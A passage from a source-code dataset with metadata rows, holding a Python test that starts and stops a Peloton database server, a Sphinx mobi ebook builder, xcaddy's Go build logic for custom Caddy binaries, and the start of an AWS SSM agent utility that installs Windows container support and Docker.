my_env['LD_LIBRARY_PATH'] += os.pathsep + LIB_DIR
else:
my_env['LD_LIBRARY_PATH'] = LIB_DIR
print(my_env['LD_LIBRARY_PATH'])
initdb = os.path.join(TOOLS_DIR, "initdb")
pg_ctl = os.path.join(TOOLS_DIR, "pg_ctl")
## ==============================================
## Test cases
## ==============================================
class BasicTest(unittest.TestCase):
def setUp(self):
LOG.info("Kill previous Peloton")
cmd = 'pkill -9 "peloton"'
self.exec_cmd(cmd, False)
LOG.info("Creating symbolic link for peloton")
cmd = 'ln -s ' + LIB_DIR + "/peloton " + TOOLS_DIR + "/.libs/"
self.exec_cmd(cmd, False)
LOG.info("Setting up temp data dir")
self.temp_dir_path = tempfile.mkdtemp()
LOG.info("Temp data dir : %s" % (self.temp_dir_path))
def test_basic(self):
LOG.info("Bootstrap data dir using initdb")
cmd = initdb + ' ' + self.temp_dir_path
self.exec_cmd(cmd)
LOG.info("Starting the Peloton server")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path + '/basic_test_logfile start'
self.exec_cmd(cmd)
LOG.info("Waiting for the server to start")
time.sleep(5)
LOG.info("Stopping the Peloton server")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path+'/basic_test_logfile stop'
self.exec_cmd(cmd)
LOG.info("Starting the Peloton server in TEST MODE")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path+'/bridge_test_logfile -o -Z start'
self.exec_cmd(cmd)
LOG.info("Waiting for the server to start")
time.sleep(5)
LOG.info("Stopping the Peloton server")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path+'/bridge_test_logfile stop'
self.exec_cmd(cmd)
def exec_cmd(self, cmd, check=True):
"""
Execute the external command and get its exitcode, stdout and stderr.
"""
args = shlex.split(cmd)
proc = Popen(args, stdout=PIPE, stderr=PIPE, env=my_env)
out, err = proc.communicate()
exitcode = proc.returncode
print(out)
print(err)
sys.stdout.flush()
if check:
self.assertTrue(exitcode == 0)
def tearDown(self):
LOG.info("Cleaning up the data dir")
shutil.rmtree(self.temp_dir_path)
os.remove(TOOLS_DIR + "/.libs/peloton")
## ==============================================
## MAIN
## ==============================================
if __name__ == '__main__':
unittest.main(
testRunner=xmlrunner.XMLTestRunner(output='python_tests', outsuffix=""),
failfast=False, buffer=False, catchbreak=False
)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
code/doc_builders/mobi.py
|
# -*- coding: utf-8 -*-
"""
sphinx.builders.mobi
~~~~~~~~~~~~~~~~~~~~
Build mobi files.
Originally derived from epub.py.
:copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import os
import re
import shutil
import sys
import time
import codecs
import zipfile
import subprocess
from os import path
from docutils import nodes
import sphinx
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.util.osutil import EEXIST, make_filename
from sphinx.util.smartypants import sphinx_smarty_pants as ssp
# (Fragment) templates from which the metainfo files content.opf, toc.ncx,
# mimetype, and META-INF/container.xml are created.
# This template section also defines strings that are embedded in the html
# output but that may be customized by (re-)setting module attributes,
# e.g. from conf.py.
_mimetype_template = 'application/x-mobipocket-ebook' # no EOL!
_container_template = u'''\
<?xml version="1.0" encoding="UTF-8"?>
<container version="1.0"
xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
<rootfile full-path="content.opf"
media-type="application/oebps-package+xml"/>
</rootfiles>
</container>
'''
_toc_template = u'''\
<?xml version="1.0"?>
<ncx version="2005-1" xmlns="http://www.daisy.org/z3986/2005/ncx/">
<head>
<meta name="dtb:uid" content="%(uid)s"/>
<meta name="dtb:depth" content="%(level)d"/>
<meta name="dtb:totalPageCount" content="0"/>
<meta name="dtb:maxPageNumber" content="0"/>
</head>
<docTitle>
<text>%(title)s</text>
</docTitle>
<navMap>
%(navpoints)s
</navMap>
</ncx>
'''
_navpoint_template = u'''\
%(indent)s <navPoint id="%(navpoint)s" playOrder="%(playorder)d">
%(indent)s <navLabel>
%(indent)s <text>%(text)s</text>
%(indent)s </navLabel>
%(indent)s <content src="%(refuri)s" />
%(indent)s </navPoint>'''
_navpoint_indent = ' '
_navPoint_template = 'navPoint%d'
_content_template = u'''\
<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" version="2.0"
unique-identifier="%(uid)s">
<metadata xmlns:opf="http://www.idpf.org/2007/opf"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<dc:language>%(lang)s</dc:language>
<dc:title>%(title)s</dc:title>
<dc:creator opf:role="aut">%(author)s</dc:creator>
<dc:publisher>%(publisher)s</dc:publisher>
<dc:rights>%(copyright)s</dc:rights>
<dc:identifier id="%(uid)s" opf:scheme="%(scheme)s">%(id)s</dc:identifier>
<dc:date>%(date)s</dc:date>
</metadata>
<manifest>
<item id="ncx" href="toc.ncx" media-type="application/x-dtbncx+xml" />
%(files)s
</manifest>
<spine toc="ncx">
%(spine)s
</spine>
<guide>
<reference Type="toc" title="Table of Contents" href="index.html" />
</guide>
</package>
'''
_cover_template = u'''\
<meta name="cover" content="%s"/>
'''
_file_template = u'''\
<item id="%(id)s"
href="%(href)s"
media-type="%(media_type)s" />'''
_spine_template = u'''\
<itemref idref="%(idref)s" />'''
_toctree_template = u'toctree-l%d'
_link_target_template = u' [%(uri)s]'
_css_link_target_class = u'link-target'
_media_types = {
'.html': 'application/xhtml+xml',
'.css': 'text/css',
'.png': 'image/png',
'.gif': 'image/gif',
'.svg': 'image/svg+xml',
'.jpg': 'image/jpeg',
'.jpeg': 'image/jpeg',
'.otf': 'application/x-font-otf',
'.ttf': 'application/x-font-ttf',
}
# Regular expression to match colons only in local fragment identifiers.
# If the URI contains a colon before the #,
# it is an external link that should not change.
_refuri_re = re.compile("([^#:]*#)(.*)")
def which(program):
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for current_path in os.environ["PATH"].split(os.pathsep):
current_path = current_path.strip('"')
exe_file = os.path.join(current_path, program)
if is_exe(exe_file):
return exe_file
return None
def clean_html_file_for_kindle(filename):
def replace_tag(tag_old, tag_new, txt):
txt = txt.replace("<" + tag_old, "<" + tag_new)
return txt.replace("</{0}>".format(tag_old), "</{0}>".format(tag_new))
bakname = filename + ".bak"
shutil.move(filename, bakname)
destination = open(filename, 'w')
original = open(bakname, 'r')
for txt in original:
txt = replace_tag("span", "samp", txt)
#txt = replace_tag("pre", "code", txt)
destination.write(txt)
destination.close()
original.close()
os.remove(bakname)
# The mobi publisher
class MobiBuilder(StandaloneHTMLBuilder):
"""
Builder that outputs mobi files.
It creates the metainfo files container.opf, toc.ncx, mimetype, and
META-INF/container.xml. Afterwards, all necessary files are zipped to an
mobi file.
"""
name = 'mobi'
# don't copy the reST source
copysource = False
supported_image_types = ['image/svg+xml', 'image/png', 'image/gif',
'image/jpeg']
# don't add links
add_permalinks = False
# don't add sidebar etc.
embedded = True
# disable download role
download_support = False
# dont' create links to original images from images
html_scaled_image_link = False
# don't generate search index or include search page
search = False
def init(self):
StandaloneHTMLBuilder.init(self)
# the output files for mobi must be .html only
self.out_suffix = '.html'
self.playorder = 0
def get_theme_config(self):
return self.config.mobi_theme, {}
# generic support functions
def make_id(self, name):
"""Replace all characters not allowed for (X)HTML ids."""
return name.replace('/', '_').replace(' ', '')
def esc(self, name):
"""Replace all characters not allowed in text an attribute values."""
# Like cgi.escape, but also replace apostrophe
name = name.replace('&', '&')
name = name.replace('<', '<')
name = name.replace('>', '>')
name = name.replace('"', '"')
name = name.replace('\'', ''')
return name
def get_refnodes(self, doctree, result):
"""Collect section titles, their depth in the toc and the refuri."""
# XXX: is there a better way than checking the attribute
# toctree-l[1-8] on the parent node?
if isinstance(doctree, nodes.reference) and doctree.has_key('refuri'):
refuri = doctree['refuri']
if refuri.startswith('http://') or refuri.startswith('https://') \
or refuri.startswith('irc:') or refuri.startswith('mailto:'):
return result
classes = doctree.parent.attributes['classes']
for level in range(8, 0, -1): # or range(1, 8)?
if (_toctree_template % level) in classes:
result.append({
'level': level,
'refuri': self.esc(refuri),
'text': ssp(self.esc(doctree.astext()))
})
break
else:
for elem in doctree.children:
result = self.get_refnodes(elem, result)
return result
def get_toc(self):
"""Get the total table of contents, containg the master_doc
and pre and post files not managed by sphinx.
"""
doctree = self.env.get_and_resolve_doctree(self.config.master_doc,
self, prune_toctrees=False)
self.refnodes = self.get_refnodes(doctree, [])
master_dir = os.path.dirname(self.config.master_doc)
if master_dir:
master_dir += '/' # XXX or os.sep?
for item in self.refnodes:
item['refuri'] = master_dir + item['refuri']
self.refnodes.insert(0, {
'level': 1,
'refuri': self.esc(self.config.master_doc + '.html'),
'text': ssp(self.esc(
self.env.titles[self.config.master_doc].astext()))
})
for file, text in reversed(self.config.mobi_pre_files):
self.refnodes.insert(0, {
'level': 1,
'refuri': self.esc(file),
'text': ssp(self.esc(text))
})
for file, text in self.config.mobi_post_files:
self.refnodes.append({
'level': 1,
'refuri': self.esc(file),
'text': ssp(self.esc(text))
})
def fix_fragment(self, prefix, fragment):
"""Return a href/id attribute with colons replaced by hyphens."""
return prefix + fragment.replace(':', '-')
def fix_ids(self, tree):
"""Replace colons with hyphens in href and id attributes.
Some readers crash because they interpret the part as a
transport protocol specification.
"""
for node in tree.traverse(nodes.reference):
if 'refuri' in node:
m = _refuri_re.match(node['refuri'])
if m:
node['refuri'] = self.fix_fragment(m.group(1), m.group(2))
if 'refid' in node:
node['refid'] = self.fix_fragment('', node['refid'])
for node in tree.traverse(sphinx.addnodes.desc_signature):
ids = node.attributes['ids']
newids = []
for id in ids:
newids.append(self.fix_fragment('', id))
node.attributes['ids'] = newids
def add_visible_links(self, tree):
"""Append visible link targets after external links."""
for node in tree.traverse(nodes.reference):
uri = node.get('refuri', '')
if (uri.startswith('http:') or uri.startswith('https:') or
uri.startswith('ftp:')) and uri not in node.astext():
uri = _link_target_template % {'uri': uri}
if uri:
idx = node.parent.index(node) + 1
link = nodes.inline(uri, uri)
link['classes'].append(_css_link_target_class)
node.parent.insert(idx, link)
def write_doc(self, docname, doctree):
"""Write one document file.
This method is overwritten in order to fix fragment identifiers
and to add visible external links.
"""
self.fix_ids(doctree)
if self.config.mobi_add_visible_links:
self.add_visible_links(doctree)
return StandaloneHTMLBuilder.write_doc(self, docname, doctree)
def fix_genindex(self, tree):
"""Fix href attributes for genindex pages."""
# XXX: modifies tree inline
# Logic modeled from themes/basic/genindex.html
for key, columns in tree:
for entryname, (links, subitems) in columns:
for (i, (ismain, link)) in enumerate(links):
m = _refuri_re.match(link)
if m:
links[i] = (ismain,
self.fix_fragment(m.group(1), m.group(2)))
for subentryname, subentrylinks in subitems:
for (i, (ismain, link)) in enumerate(subentrylinks):
m = _refuri_re.match(link)
if m:
subentrylinks[i] = (ismain,
self.fix_fragment(m.group(1), m.group(2)))
def handle_page(self, pagename, addctx, templatename='page.html',
outfilename=None, event_arg=None):
"""Create a rendered page.
This method is overwritten for genindex pages in order to fix href link
attributes.
"""
if pagename.startswith('genindex'):
self.fix_genindex(addctx['genindexentries'])
StandaloneHTMLBuilder.handle_page(self, pagename, addctx, templatename,
outfilename, event_arg)
# Finish by building the mobi file
def handle_finish(self):
"""Create the metainfo files and finally the mobi."""
self.get_toc()
self.build_mimetype(self.outdir, 'mimetype')
self.build_container(self.outdir, 'META-INF/container.xml')
self.build_content(self.outdir, 'content.opf')
self.build_toc(self.outdir, 'toc.ncx')
# we build an epub for now
self.cleanup_files()
mobi_name = self.config.mobi_basename + '.mobi'
fullname = os.path.join(self.outdir, "content.opf")
kindle_exists = which('kindlegen')
if not kindle_exists:
raise Exception('kindlegen executable not find in path. Not installed?')
subprocess.call(["kindlegen", "-c1", fullname, "-o", mobi_name])
def build_mimetype(self, outdir, outname):
"""Write the metainfo file mimetype."""
self.info('writing %s file...' % outname)
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(_mimetype_template)
finally:
f.close()
def build_container(self, outdir, outname):
"""Write the metainfo file META-INF/cointainer.xml."""
self.info('writing %s file...' % outname)
fn = path.join(outdir, outname)
try:
os.mkdir(path.dirname(fn))
except OSError as err:
if err.errno != EEXIST:
raise
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(_container_template)
finally:
f.close()
def content_metadata(self, files, spine):
"""Create a dictionary with all metadata for the content.opf
file properly escaped.
"""
metadata = {}
metadata['title'] = self.esc(self.config.mobi_title)
metadata['author'] = self.esc(self.config.mobi_author)
metadata['uid'] = self.esc(self.config.mobi_uid)
metadata['lang'] = self.esc(self.config.mobi_language)
metadata['publisher'] = self.esc(self.config.mobi_publisher)
metadata['copyright'] = self.esc(self.config.mobi_copyright)
metadata['scheme'] = self.esc(self.config.mobi_scheme)
metadata['id'] = self.esc(self.config.mobi_identifier)
metadata['date'] = self.esc(time.strftime('%Y-%m-%d'))
metadata['files'] = files
metadata['spine'] = spine
return metadata
def build_content(self, outdir, outname):
"""Write the metainfo file content.opf It contains bibliographic data,
a file list and the spine (the reading order).
"""
self.info('writing %s file...' % outname)
# files
if not outdir.endswith(os.sep):
outdir += os.sep
olen = len(outdir)
projectfiles = []
self.files = []
self.ignored_files = ['.buildinfo',
'mimetype', 'content.opf', 'toc.ncx', 'META-INF/container.xml',
self.config.mobi_basename + '.mobi'] + \
self.config.mobi_exclude_files
for root, dirs, files in os.walk(outdir):
for fn in files:
filename = path.join(root, fn)[olen:]
if filename in self.ignored_files:
continue
ext = path.splitext(filename)[-1]
if ext not in _media_types:
self.warn('unknown mimetype for %s, ignoring' % filename,
type='mobi', subtype='unknown_project_files')
continue
projectfiles.append(_file_template % {
'href': self.esc(filename),
'id': self.esc(self.make_id(filename)),
'media_type': self.esc(_media_types[ext])
})
self.files.append(filename)
# spine
spine = []
for item in self.refnodes:
if '#' in item['refuri']:
continue
if item['refuri'] in self.ignored_files:
continue
spine.append(_spine_template % {
'idref': self.esc(self.make_id(item['refuri']))
})
for info in self.domain_indices:
spine.append(_spine_template % {
'idref': self.esc(self.make_id(info[0] + self.out_suffix))
})
if self.config.html_use_index:
spine.append(_spine_template % {
'idref': self.esc(self.make_id('genindex' + self.out_suffix))
})
# add the optional cover
content_tmpl = _content_template
if self.config.mobi_cover:
image = self.config.mobi_cover
mpos = content_tmpl.rfind('</metadata>')
cpos = content_tmpl.rfind('\n', 0 , mpos) + 1
content_tmpl = content_tmpl[:cpos] + \
(_cover_template % image) + \
content_tmpl[cpos:]
projectfiles = '\n'.join(projectfiles)
spine = '\n'.join(spine)
# write the project file
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(content_tmpl % \
self.content_metadata(projectfiles, spine))
finally:
f.close()
def new_navpoint(self, node, level, incr=True):
"""Create a new entry in the toc from the node at given level."""
# XXX Modifies the node
if incr:
self.playorder += 1
node['indent'] = _navpoint_indent * level
node['navpoint'] = self.esc(_navPoint_template % self.playorder)
node['playorder'] = self.playorder
return _navpoint_template % node
def insert_subnav(self, node, subnav):
"""Insert nested navpoints for given node.
The node and subnav are already rendered to text.
"""
nlist = node.rsplit('\n', 1)
nlist.insert(-1, subnav)
return '\n'.join(nlist)
def build_navpoints(self, nodes):
"""Create the toc navigation structure.
Subelements of a node are nested inside the navpoint. For nested nodes
the parent node is reinserted in the subnav.
"""
navstack = []
navlist = []
level = 1
lastnode = None
for node in nodes:
if not node['text']:
continue
file = node['refuri'].split('#')[0]
if file in self.ignored_files:
continue
if node['level'] > self.config.mobi_tocdepth:
continue
if node['level'] == level:
navlist.append(self.new_navpoint(node, level))
elif node['level'] == level + 1:
navstack.append(navlist)
navlist = []
level += 1
if lastnode and self.config.mobi_tocdup:
# Insert starting point in subtoc with same playOrder
navlist.append(self.new_navpoint(lastnode, level, False))
navlist.append(self.new_navpoint(node, level))
else:
while node['level'] < level:
subnav = '\n'.join(navlist)
navlist = navstack.pop()
navlist[-1] = self.insert_subnav(navlist[-1], subnav)
level -= 1
navlist.append(self.new_navpoint(node, level))
lastnode = node
while level != 1:
subnav = '\n'.join(navlist)
navlist = navstack.pop()
navlist[-1] = self.insert_subnav(navlist[-1], subnav)
level -= 1
return '\n'.join(navlist)
def toc_metadata(self, level, navpoints):
"""Create a dictionary with all metadata for the toc.ncx file
properly escaped.
"""
metadata = {}
metadata['uid'] = self.config.mobi_uid
metadata['title'] = self.config.mobi_title
metadata['level'] = level
metadata['navpoints'] = navpoints
return metadata
def build_toc(self, outdir, outname):
"""Write the metainfo file toc.ncx."""
self.info('writing %s file...' % outname)
navpoints = self.build_navpoints(self.refnodes)
level = max(item['level'] for item in self.refnodes)
level = min(level, self.config.mobi_tocdepth)
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(_toc_template % self.toc_metadata(level, navpoints))
finally:
f.close()
def cleanup_files(self):
"""Write the mobi file using kindlegen."""
self.info('cleaning html files...')
for item in self.files:
if item.endswith("html"):
clean_html_file_for_kindle(os.path.join(self.outdir, item))
def setup(app):
app.add_config_value('mobi_basename',lambda self: make_filename(self.project), None)
app.add_config_value('mobi_theme','mobi', 'html')
app.add_config_value('mobi_title',lambda self: self.html_title, 'html')
app.add_config_value('mobi_author','unknown', 'html')
app.add_config_value('mobi_language',lambda self: self.language or 'en', 'html')
app.add_config_value('mobi_publisher','unknown', 'html')
app.add_config_value('mobi_copyright',lambda self: self.copyright, 'html')
app.add_config_value('mobi_identifier','unknown', 'html')
app.add_config_value('mobi_scheme','unknown', 'html')
app.add_config_value('mobi_uid','unknown', 'env')
app.add_config_value('mobi_cover',(), 'env')
app.add_config_value('mobi_pre_files',[], 'env')
app.add_config_value('mobi_post_files',[], 'env')
app.add_config_value('mobi_exclude_files',[], 'env')
app.add_config_value('mobi_tocdepth',3, 'env')
app.add_config_value('mobi_tocdup',True, 'env')
app.add_config_value('mobi_add_visible_links',True, 'env')
app.add_builder(MobiBuilder)
|
[] |
[] |
[
"PATH"
] |
[]
|
["PATH"]
|
python
| 1 | 0 | |
builder.go
|
// Copyright 2020 Matthew Holt
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package xcaddy
import (
"context"
"fmt"
"io/ioutil"
"log"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"time"
"github.com/Masterminds/semver/v3"
)
// Builder can produce a custom Caddy build with the
// configuration it represents.
type Builder struct {
Compile
CaddyVersion string `json:"caddy_version,omitempty"`
Plugins []Dependency `json:"plugins,omitempty"`
Replacements []Replace `json:"replacements,omitempty"`
TimeoutGet time.Duration `json:"timeout_get,omitempty"`
TimeoutBuild time.Duration `json:"timeout_build,omitempty"`
RaceDetector bool `json:"race_detector,omitempty"`
SkipCleanup bool `json:"skip_cleanup,omitempty"`
}
// Build builds Caddy at the configured version with the
// configured plugins and plops down a binary at outputFile.
func (b Builder) Build(ctx context.Context, outputFile string) error {
if outputFile == "" {
return fmt.Errorf("output file path is required")
}
// the user's specified output file might be relative, and
// because the `go build` command is executed in a different,
// temporary folder, we convert the user's input to an
// absolute path so it goes the expected place
absOutputFile, err := filepath.Abs(outputFile)
if err != nil {
return err
}
// set some defaults from the environment, if applicable
if b.OS == "" {
b.OS = os.Getenv("GOOS")
}
if b.Arch == "" {
b.Arch = os.Getenv("GOARCH")
}
if b.ARM == "" {
b.ARM = os.Getenv("GOARM")
}
// prepare the build environment
buildEnv, err := b.newEnvironment(ctx)
if err != nil {
return err
}
defer buildEnv.Close()
// prepare the environment for the go command; for
// the most part we want it to inherit our current
// environment, with a few customizations
env := os.Environ()
env = setEnv(env, "GOOS="+b.OS)
env = setEnv(env, "GOARCH="+b.Arch)
env = setEnv(env, "GOARM="+b.ARM)
if b.RaceDetector && !b.Compile.Cgo {
log.Println("[WARNING] Enabling cgo because it is required by the race detector")
b.Compile.Cgo = true
}
env = setEnv(env, fmt.Sprintf("CGO_ENABLED=%s", b.Compile.CgoEnabled()))
log.Println("[INFO] Building Caddy")
// compile
cmd := buildEnv.newCommand("go", "build",
"-o", absOutputFile,
"-ldflags", "-w -s", // trim debug symbols
"-trimpath",
)
if b.RaceDetector {
cmd.Args = append(cmd.Args, "-race")
}
cmd.Env = env
err = buildEnv.runCommand(ctx, cmd, b.TimeoutBuild)
if err != nil {
return err
}
log.Printf("[INFO] Build complete: %s", outputFile)
return nil
}
// setEnv sets an environment variable-value pair in
// env, overriding an existing variable if it already
// exists. The env slice is one such as is returned
// by os.Environ(), and set must also have the form
// of key=value.
func setEnv(env []string, set string) []string {
parts := strings.SplitN(set, "=", 2)
key := parts[0]
for i := 0; i < len(env); i++ {
if strings.HasPrefix(env[i], key+"=") {
env[i] = set
return env
}
}
return append(env, set)
}
// Dependency pairs a Go module path with a version.
type Dependency struct {
// The name (import path) of the Go package. If at a version > 1,
// it should contain semantic import version (i.e. "/v2").
// Used with `go get`.
PackagePath string `json:"module_path,omitempty"`
// The version of the Go module, as used with `go get`.
Version string `json:"version,omitempty"`
}
// ReplacementPath represents an old or new path component
// within a Go module replacement directive.
type ReplacementPath string
// Param reformats a go.mod replace directive to be
// compatible with the `go mod edit` command.
func (r ReplacementPath) Param() string {
return strings.Replace(string(r), " ", "@", 1)
}
func (r ReplacementPath) String() string { return string(r) }
// Replace represents a Go module replacement.
type Replace struct {
// The import path of the module being replaced.
Old ReplacementPath `json:"old,omitempty"`
// The path to the replacement module.
New ReplacementPath `json:"new,omitempty"`
}
// NewReplace creates a new instance of Replace provided old and
// new Go module paths
func NewReplace(old, new string) Replace {
return Replace{
Old: ReplacementPath(old),
New: ReplacementPath(new),
}
}
// newTempFolder creates a new folder in a temporary location.
// It is the caller's responsibility to remove the folder when finished.
func newTempFolder() (string, error) {
var parentDir string
if runtime.GOOS == "darwin" {
// After upgrading to macOS High Sierra, Caddy builds mysteriously
// started missing the embedded version information that -ldflags
// was supposed to produce. But it only happened on macOS after
// upgrading to High Sierra, and it didn't happen with the usual
// `go run build.go` -- only when using a buildenv. Bug in git?
// Nope. Not a bug in Go 1.10 either. Turns out it's a breaking
// change in macOS High Sierra. When the GOPATH of the buildenv
// was set to some other folder, like in the $HOME dir, it worked
// fine. Only within $TMPDIR it broke. The $TMPDIR folder is inside
// /var, which is symlinked to /private/var, which is mounted
// with noexec. I don't understand why, but evidently that
// makes -ldflags of `go build` not work. Bizarre.
// The solution, I guess, is to just use our own "temp" dir
// outside of /var. Sigh... as long as it still gets cleaned up,
// I guess it doesn't matter too much.
// See: https://github.com/caddyserver/caddy/issues/2036
// and https://twitter.com/mholt6/status/978345803365273600 (thread)
// (using an absolute path prevents problems later when removing this
// folder if the CWD changes)
var err error
parentDir, err = filepath.Abs(".")
if err != nil {
return "", err
}
}
ts := time.Now().Format(yearMonthDayHourMin)
return ioutil.TempDir(parentDir, fmt.Sprintf("buildenv_%s.", ts))
}
// versionedModulePath helps enforce Go Module's Semantic Import Versioning (SIV) by
// returning the form of modulePath with the major component of moduleVersion added,
// if > 1. For example, inputs of "foo" and "v1.0.0" will return "foo", but inputs
// of "foo" and "v2.0.0" will return "foo/v2", for use in Go imports and go commands.
// Inputs that conflict, like "foo/v2" and "v3.1.0" are an error. This function
// returns the input if the moduleVersion is not a valid semantic version string.
// If moduleVersion is empty string, the input modulePath is returned without error.
func versionedModulePath(modulePath, moduleVersion string) (string, error) {
if moduleVersion == "" {
return modulePath, nil
}
ver, err := semver.StrictNewVersion(strings.TrimPrefix(moduleVersion, "v"))
if err != nil {
// only return the error if we know they were trying to use a semantic version
// (could have been a commit SHA or something)
if strings.HasPrefix(moduleVersion, "v") {
return "", fmt.Errorf("%s: %v", moduleVersion, err)
}
return modulePath, nil
}
major := ver.Major()
// see if the module path has a major version at the end (SIV)
matches := moduleVersionRegexp.FindStringSubmatch(modulePath)
if len(matches) == 2 {
modPathVer, err := strconv.Atoi(matches[1])
if err != nil {
return "", fmt.Errorf("this error should be impossible, but module path %s has bad version: %v", modulePath, err)
}
if modPathVer != int(major) {
return "", fmt.Errorf("versioned module path (%s) and requested module major version (%d) diverge", modulePath, major)
}
} else if major > 1 {
modulePath += fmt.Sprintf("/v%d", major)
}
return path.Clean(modulePath), nil
}
var moduleVersionRegexp = regexp.MustCompile(`.+/v(\d+)$`)
const (
// yearMonthDayHourMin is the date format
// used for temporary folder paths.
yearMonthDayHourMin = "2006-01-02-1504"
defaultCaddyModulePath = "github.com/caddyserver/caddy"
)
|
[
"\"GOOS\"",
"\"GOARCH\"",
"\"GOARM\""
] |
[] |
[
"GOARCH",
"GOOS",
"GOARM"
] |
[]
|
["GOARCH", "GOOS", "GOARM"]
|
go
| 3 | 0 | |
agent/plugins/configurecontainers/windowscontainerutil/windowscontainerutil.go
|
// Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"). You may not
// use this file except in compliance with the License. A copy of the
// License is located at
//
// http://aws.amazon.com/apache2.0/
//
// or in the "license" file accompanying this file. This file is distributed
// on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
// either express or implied. See the License for the specific language governing
// permissions and limitations under the License.
// Package windowscontainerutil implements the the install and uninstall steps for windows for the configurecontainers plugin.
package windowscontainerutil
import (
"errors"
"fmt"
"os"
"strings"
"time"
"github.com/aws/amazon-ssm-agent/agent/appconfig"
"github.com/aws/amazon-ssm-agent/agent/context"
"github.com/aws/amazon-ssm-agent/agent/contracts"
"github.com/aws/amazon-ssm-agent/agent/fileutil"
"github.com/aws/amazon-ssm-agent/agent/fileutil/artifact"
"github.com/aws/amazon-ssm-agent/agent/framework/processor/executer/iohandler"
"github.com/aws/amazon-ssm-agent/agent/plugins/pluginutil"
)
const (
DOCKER_DOWNLOAD_URL = "https://download.docker.com/components/engine/windows-server/cs-1.12/docker.zip"
DOCKER_UNCOMPRESS_DIRECTORY = "C:\\Program Files"
DOCKER_INSTALLED_DIRECTORY = DOCKER_UNCOMPRESS_DIRECTORY + "\\docker"
)
func RunInstallCommands(context context.T, orchestrationDirectory string, out iohandler.IOHandler) {
var err error
var command string
var platformVersion string
var parameters []string
var requireReboot bool
var isNanoServer bool
var output string
log := context.Log()
platformVersion, err = dep.PlatformVersion(log)
if err != nil {
log.Error("Error detecting platform version", err)
out.MarkAsFailed(fmt.Errorf("Error detecting platform version: %v", err))
return
}
log.Debug("Platform Version:", platformVersion)
if !strings.HasPrefix(platformVersion, "10") {
out.MarkAsFailed(errors.New("ConfigureDocker is only supported on Microsoft Windows Server 2016."))
return
}
isNanoServer, err = dep.IsPlatformNanoServer(log)
if err != nil {
log.Error("Error detecting if Nano Server", err)
out.MarkAsFailed(fmt.Errorf("Error detecting if Nano Server: %v", err))
return
}
if isNanoServer {
command = "(Get-PackageProvider -ListAvailable).Name"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting package providers", err)
out.MarkAsFailed(fmt.Errorf("Error getting package providers: %v", err))
return
}
log.Debug("Get-PackageProvider output:", output)
packageInstalled := strings.Contains(output, "NanoServerPackage")
if !packageInstalled {
out.AppendInfo("Installing Nano Server package provider.")
command = `Install-PackageProvider -Name Nuget -MinimumVersion 2.8.5.201 -Force`
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 60, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error installing Nuget package provider", err)
out.MarkAsFailed(fmt.Errorf("Error installing Nuget package provider: %v", err))
return
}
log.Debug("Install Package provider output:", output)
command = `Save-Module -Path "$env:programfiles\WindowsPowerShell\Modules\" -Name NanoServerPackage -minimumVersion 1.0.1.0`
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 60, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error saving module", err)
out.MarkAsFailed(fmt.Errorf("Error saving Nano server package: %v", err))
return
}
log.Debug("Save-Module output:", output)
command = `Import-PackageProvider NanoServerPackage`
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error importing package", err)
out.MarkAsFailed(fmt.Errorf("Error importing package: %v", err))
return
}
log.Debug("Import-PackageProvider output:", output)
}
//Install containers package
command = "(Get-Package -providername NanoServerPackage).Name"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting microsoft-nanoserver-containers-package", err)
out.MarkAsFailed(fmt.Errorf("Error getting microsoft-nanoserver-containers-package: %v", err))
return
}
log.Debug("Get-Package output:", output)
packageInstalled = strings.Contains(output, "Microsoft-NanoServer-Containers-Package")
if !packageInstalled {
out.AppendInfo("Installing containers package.")
command = "Install-NanoServerPackage microsoft-nanoserver-containers-package"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error installing microsoft-nanoserver-containers-package", err)
out.MarkAsFailed(fmt.Errorf("Error installing microsoft-nanoserver-containers-package: %v", err))
return
}
log.Debug("Install-NanoServerPackage output:", output)
requireReboot = true
}
} else {
//install windows containers feature
command = "(Get-WindowsFeature -Name containers).Installed"
